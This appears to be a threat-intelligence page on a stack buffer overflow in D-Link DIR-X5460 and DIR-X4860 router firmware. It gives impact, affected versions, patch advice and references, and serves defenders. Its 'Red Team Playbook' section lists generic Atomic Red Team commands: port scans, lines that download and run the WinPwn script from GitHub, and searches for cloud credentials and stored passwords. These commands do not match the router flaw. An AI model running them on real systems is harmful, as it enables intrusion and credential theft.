CVE-2024-45694
Overview
This vulnerability is a stack-based buffer overflow in the web service component of certain D-Link wireless routers. The flaw arises from improper bounds checking when processing specific input data, allowing memory corruption on the call stack. The affected component is the web management interface of the DIR-X5460 A1 model and related firmware versions.
Vulnerability Description
The web service of certain models of D-Link wireless routers contains a Stack-based Buffer Overflow vulnerability, which allows unauthenticated remote attackers to exploit this vulnerability to execute arbitrary code on the device.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on the affected device, potentially gaining full control over the router. No user interaction or prior authentication is required, as indicated by CVSS vector AV:N/AC:L/PR:N/UI:N. This can lead to persistent compromise of network infrastructure, interception or manipulation of traffic, and disruption of network services, severely impacting organizational security and availability.
Solution
D-Link has released firmware updates addressing this vulnerability for the DIR-X5460 A1 model, specifically versions beyond 1.10 for DIR-X5460 and above 1.00 for DIR-X4860. Administrators should apply these firmware updates promptly as detailed in the TW-CERT advisories (https://www.twcert.org.tw/en/cp-139-8081-3fb39-2.html). No alternative workarounds are provided; updating to the vendor-supplied patched firmware is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in certain models of D-Link wireless routers is characterized by a stack-based buffer overflow within the web service component. This flaw arises when the application fails to properly validate the size of input data before copying it to a fixed-length buffer on the stack. As a result, an attacker can send specially crafted requests that exceed the buffer's capacity, leading to the overwriting of adjacent memory. This exploitation can allow the execution of arbitrary code, potentially granting the attacker full control over the affected device. The severity of this vulnerability is underscored by its high CVSS score, indicating a critical risk to the security of the devices and the networks they serve.
Attack vectors for this vulnerability are particularly concerning due to the lack of authentication required for exploitation. An attacker can remotely target the affected routers over the internet, making it accessible to anyone with knowledge of the vulnerability. Scenarios may include sending malformed HTTP requests to the router's web interface, which could lead to the execution of malicious payloads. Once the attacker gains control, they can manipulate network traffic, redirect users to malicious sites, or even launch further attacks against other devices on the network. The potential for widespread impact is significant, especially in environments where these routers are used as gateways to larger networks.
The real-world implications of this vulnerability are profound, particularly for businesses relying on these routers for their operations. Compromised devices can lead to unauthorized access to sensitive data, disruption of services, and damage to the organization's reputation. For example, if an attacker uses the compromised router to intercept communications or deploy malware within the corporate network, the consequences could range from financial loss to legal ramifications stemming from data breaches. Additionally, the ease of exploitation means that even organizations with limited cybersecurity resources may find themselves at risk, highlighting the need for proactive security measures.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating router firmware is crucial, as manufacturers often release patches to address known vulnerabilities. Network monitoring tools can help identify unusual traffic patterns indicative of exploitation attempts. Furthermore, employing intrusion detection systems can provide an additional layer of defense by alerting administrators to potential breaches. Organizations should also consider segmenting their networks to limit the impact of a compromised device, ensuring that sensitive systems are isolated from potentially vulnerable routers.
In conclusion, the stack-based buffer overflow vulnerability in specific D-Link wireless routers poses a significant threat to both individual users and organizations. The combination of remote exploitability and the potential for arbitrary code execution creates a critical risk that must be addressed. By understanding the technical details of the vulnerability, recognizing the various attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against this and similar threats in the future.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the stack-based buffer overflow vulnerability in D-Link DIR-X5460 A1 routers. While overall exploit activity remains limited, the emergence of new telemetry signals indicates that threat actors are actively probing for vulnerable devices, suggesting an increased operational interest. Despite a slight decline in the EPSS score, this does not reflect a reduced risk but rather the volatility of exploit prediction metrics at this early stage of exploitation. The absence of publicly available exploit details continues to obscure the full scope of adversary capabilities; however, the uptick in detection activity underscores an elevated threat posture. For defenders, this development signals a critical need to enhance monitoring and incident response readiness, as the vulnerability’s remote code execution potential remains a significant vector for compromise. Consequently, the threat level should be considered heightened due to the confirmed exploitation attempts, warranting sustained vigilance.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dir-X5460 Firmware | 1.01 |
cpe:2.3:o:dlink:dir-x5460_firmware:1.01:*:*:*:*:*:*:*
|
|
|
Dlink | Dir-X5460 Firmware | 1.02 |
cpe:2.3:o:dlink:dir-x5460_firmware:1.02:*:*:*:*:*:*:*
|
|
|
Dlink | Dir-X5460 Firmware | 1.04 |
cpe:2.3:o:dlink:dir-x5460_firmware:1.04:*:*:*:*:*:*:*
|
|
|
Dlink | Dir-X5460 Firmware | 1.10 |
cpe:2.3:o:dlink:dir-x5460_firmware:1.10:*:*:*:*:*:*:*
|
|
|
Dlink | Dir-X4860 Firmware | 1.00 |
cpe:2.3:o:dlink:dir-x4860_firmware:1.00:*:*:*:*:*:*:*
|
|
|
Dlink | Dir-X4860 Firmware | 1.04 |
cpe:2.3:o:dlink:dir-x4860_firmware:1.04:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-45694 |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/tw/cp-132-8080-7f494-1.html |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/en/cp-139-8081-3fb39-2.html |